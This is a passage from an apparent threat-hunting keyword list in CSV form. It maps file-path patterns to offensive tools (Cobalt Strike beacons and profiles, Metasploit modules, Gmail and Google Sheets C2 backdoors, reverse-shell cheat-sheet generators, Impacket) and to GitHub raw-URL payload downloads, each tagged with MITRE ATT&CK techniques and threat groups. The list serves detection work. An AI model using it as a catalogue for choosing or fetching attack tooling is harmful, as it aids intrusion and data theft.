T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://gist.github.com/G0ldenGunSec/8ca0e853dd5637af2881697f8de6aecc,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*/GadgetToJScript.git*,offensive_tool_keyword,GadgetToJScript,A tool for generating 
.NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.,T1059.001 - T1078 - T1059.005,TA0002 - TA0004 - TA0001,N/A,N/A,Exploitation tools,https://github.com/med0x2e/GadgetToJScript,1,1,N/A,10,8,777,157,2021-07-26T17:35:40Z,2019-10-05T12:27:19Z -*/gandcrab.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/ganglia-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/gather/credentials*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/gather/forensics*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/gato/*attack.py*,offensive_tool_keyword,gato,GitHub Self-Hosted Runner Enumeration and Attack Tool,T1083 - T1087 - T1081,TA0006 - TA0007,N/A,N/A,Reconnaissance,https://github.com/praetorian-inc/gato,1,1,N/A,N/A,3,263,24,2023-07-27T15:15:32Z,2023-01-06T15:43:27Z -*/GC2-sheet/*,offensive_tool_keyword,GC2-sheet,GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.,T1071.002 - T1560 - T1105,TA0011 - TA0010 - TA0008,N/A,N/A,C2,https://github.com/looCiprian/GC2-sheet,1,1,N/A,10,10,449,89,2023-07-06T19:22:36Z,2021-09-15T19:06:12Z -*/gcat.git*,offensive_tool_keyword,gcat,A PoC backdoor that uses Gmail as a C&C server,T1071.001 - T1094 - T1102.002,TA0011 - TA0010 - TA0008,N/A,N/A,C2,https://github.com/byt3bl33d3r/gcat,1,1,N/A,10,10,1300,466,2018-11-16T13:43:15Z,2015-06-03T01:28:00Z -*/gcat.py,offensive_tool_keyword,gcat,A PoC backdoor that uses Gmail as a C&C server,T1071.001 - T1094 - T1102.002,TA0011 - TA0010 - TA0008,N/A,N/A,C2,https://github.com/byt3bl33d3r/gcat,1,1,N/A,10,10,1300,466,2018-11-16T13:43:15Z,2015-06-03T01:28:00Z -*/geacon/*beacon*,offensive_tool_keyword,cobaltstrike,Practice Go programming and implement CobaltStrike's Beacon in Go,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - 
T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/darkr4y/geacon,1,1,N/A,10,10,1038,224,2020-10-02T10:34:37Z,2020-02-14T14:01:29Z -*/geacon_pro*,offensive_tool_keyword,cobaltstrike,Practice Go programming and implement CobaltStrike's Beacon in Go,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/darkr4y/geacon,1,1,N/A,10,10,1038,224,2020-10-02T10:34:37Z,2020-02-14T14:01:29Z 
-*/Gemail-Hack.git*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/Ha3MrX/Gemail-Hack,1,1,N/A,7,9,813,385,2022-02-18T16:12:45Z,2018-04-19T13:48:41Z -*/GetBrowsers.ps1*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*/get-clipboard.py*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/getLegit/cdnl*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*/getLegit/grkg*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*/getLegit/prvw*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*/getLegit/qhwl*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*/getLegit/tsom*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*/getLegit/zijz*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*/get-loggedon/*.c*,offensive_tool_keyword,cobaltstrike,Collection of CobaltStrike beacon object files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/pwn1sher/CS-BOFs,1,1,N/A,10,10,100,23,2022-02-14T09:47:30Z,2021-01-18T08:54:48Z -*/get-shucking.php*,offensive_tool_keyword,ShuckNT,ShuckNT is the script of Shuck.sh online service for on-premise use. 
It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES),T1552.001 - T1555.003 - T1078.003,TA0006 - TA0002 - TA0040,N/A,N/A,Credential Access,https://github.com/yanncam/ShuckNT,1,1,N/A,10,1,36,4,2023-02-02T10:40:59Z,2023-01-27T07:52:47Z -*/getST.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*/get-system/getsystem.c*,offensive_tool_keyword,cobaltstrike,Collection of CobaltStrike beacon object files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth 
- menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/pwn1sher/CS-BOFs,1,1,N/A,10,10,100,23,2022-02-14T09:47:30Z,2021-01-18T08:54:48Z -*/GetWebDAVStatus_BOF/*,offensive_tool_keyword,cobaltstrike,Determine if the WebClient Service (WebDAV) is running on a remote system,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/G0ldenGunSec/GetWebDAVStatus,1,1,N/A,10,10,81,18,2021-09-29T17:40:52Z,2021-09-29T17:31:21Z -*/ghidra*,offensive_tool_keyword,ghidra,Ghidra is a software reverse engineering (SRE) framework created and maintained by the National Security Agency Research Directorate. This framework includes a suite of full-featured. high-end software analysis tools that enable users to analyze compiled code on a variety of platforms including Windows. macOS. and Linux. Capabilities include disassembly. assembly. decompilation. graphing. and scripting. along with hundreds of other features. Ghidra supports a wide variety of processor instruction sets and executable formats and can be run in both user-interactive and automated modes. 
Users may also develop their own Ghidra plug-in components and/or scripts using Java or Python.,T1057 - T1053 - T1564 - T1204 - T1083,TA0002 - TA0011 - TA0008,N/A,N/A,Frameworks,https://github.com/NationalSecurityAgency/ghidra,1,0,N/A,N/A,10,43232,5251,2023-10-01T16:10:19Z,2019-03-01T03:27:48Z -*/ghostfile.aspx*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,1,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -*/GhostInTheNet.git*,offensive_tool_keyword,GhostInTheNet,Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan,T1574 - T1565 - T1055,TA0007 - TA0040 - TA0043,N/A,N/A,Sniffing & Spoofing,https://github.com/cryptolok/GhostInTheNet,1,1,N/A,7,4,359,85,2023-04-27T07:07:29Z,2017-04-22T01:53:16Z -*/GhostInTheNet.sh*,offensive_tool_keyword,GhostInTheNet,Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan,T1574 - T1565 - T1055,TA0007 - TA0040 - TA0043,N/A,N/A,Sniffing & Spoofing,https://github.com/cryptolok/GhostInTheNet,1,1,N/A,7,4,359,85,2023-04-27T07:07:29Z,2017-04-22T01:53:16Z -*/GhostInTheNet-master*,offensive_tool_keyword,GhostInTheNet,Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan,T1574 - T1565 - T1055,TA0007 - TA0040 - TA0043,N/A,N/A,Sniffing & Spoofing,https://github.com/cryptolok/GhostInTheNet,1,1,N/A,7,4,359,85,2023-04-27T07:07:29Z,2017-04-22T01:53:16Z -*/ghostscript/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/gimmeSH.sh*,offensive_tool_keyword,gimmeSH,gimmeSH. is a tool that generates a custom cheatsheet for Reverse Shell. File Transfer and Msfvenom within your terminal. you just need to provide the platform. your Internet protocol address and your port number.,T1059 T1505,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/A3h1nt/gimmeSH,1,1,N/A,N/A,2,168,27,2021-08-27T03:12:15Z,2021-08-02T07:22:15Z -*/giop-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com*.exe?raw=true*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/archive/refs/tags/*.zip*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.7z*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.apk*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.app*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.as*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.asc*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve 
payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.asp*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.bash*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.bat*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.beacon*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.bin*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.bpl*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.c*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.cer*,greyware_tool_keyword,github,Github raw access content - abused by malwares 
to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.cmd*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.com*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.cpp*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.crt*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.cs*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.csh*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.dat*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.dll*,greyware_tool_keyword,github,Github raw access content - abused by 
malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.docm*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.dos*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.exe*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.go*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.gz*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.hta*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.iso*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.jar*,greyware_tool_keyword,github,Github raw access content - 
